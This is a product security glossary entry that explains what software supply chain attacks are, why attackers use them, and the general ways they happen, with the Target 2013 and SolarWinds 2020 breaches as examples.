Product Security Glossary

Supply Chain Attack

What is a Supply Chain Attack? 

A supply chain attack, sometimes known as a software supply chain attack, happens when bad actors attack the developers or suppliers of business software.  The goal is to distribute malicious code by injecting it into the source code, the build process, or the update mechanisms for that software.  This type of attack allows bad actors to break into a business network that might have strong defenses by going through a vendor with whom the business has ties.  The vendor will typically have weaker security than the business that the bad actors really want to attack. 

What are the reasons for doing a supply chain attack? 

Bad actors have many reasons for performing a supply chain attack.  Here are some examples: 

  • They can inject malware into a payment processor program to steal financial data. 
  • By injecting malware into an Automatic Teller Machine, they can program the machine to dispense large amounts of money on-demand. 
  • Injecting malicious code into industrial controller programs can disrupt production by damaging or shutting down equipment. 
  • They can inject malware into an enterprise device such as security camera or router to gain access to the corporate network and steal commercial secrets and financial data. 

How can a supply chain attack happen? 

One way to carry out a supply chain attack is to compromise the tools that are used to build software.  For example, a few years ago researchers found that corrupted versions of Apple’s XCode and Microsoft’s Visual Studio were being distributed via various pirate software sites.  Any program that would have been built with these infected compilers would have contained malicious code.  Indeed, these infected tools seemed to be a common factor in many supply chain attacks.  Many times, software developers won’t even realize that their software creations have been compromised.  The developers will then digitally sign the infected software, causing end users to believe that the software is secure. 

Attackers can also create their own malicious programs, and sign it with a code-signing certificate that they somehow stole from a legitimate software vendor.  The end user would install the malicious software without realizing that anything was wrong. 

It’s not just applications software that could be a problem.  Attackers can find ways to infect firmware that would be supplied to manufacturers of IoT and IIoT devices.   

Another supply chain attack method involves installing malware on devices before they’re sold to the public.  The devices can include IoT cameras, USB memory sticks, or smart phones. 

What are some examples of a supply chain attack? 

In 2013, the Target retail chain in the U.S. was hit by a supply chain attack.  Attackers planted malware on their Point-of-Sale terminals that allowed the theft of credit card data for about 40 million customers.  Investigators believe that the attackers broke into the systems of one of Target’s suppliers, and stole the login credentials for the Target systems.  By doing this, the attacker completely circumvented the security system that Target had just installed. 

More recently, attackers compromised the infrastructure management software from SolarWinds, which in turn compromised many Windows Servers.  The breach was discovered by the FireEye security outfit in December 2020. 

A supply chain attack can be very costly to a business, and businesses should take care to prevent them.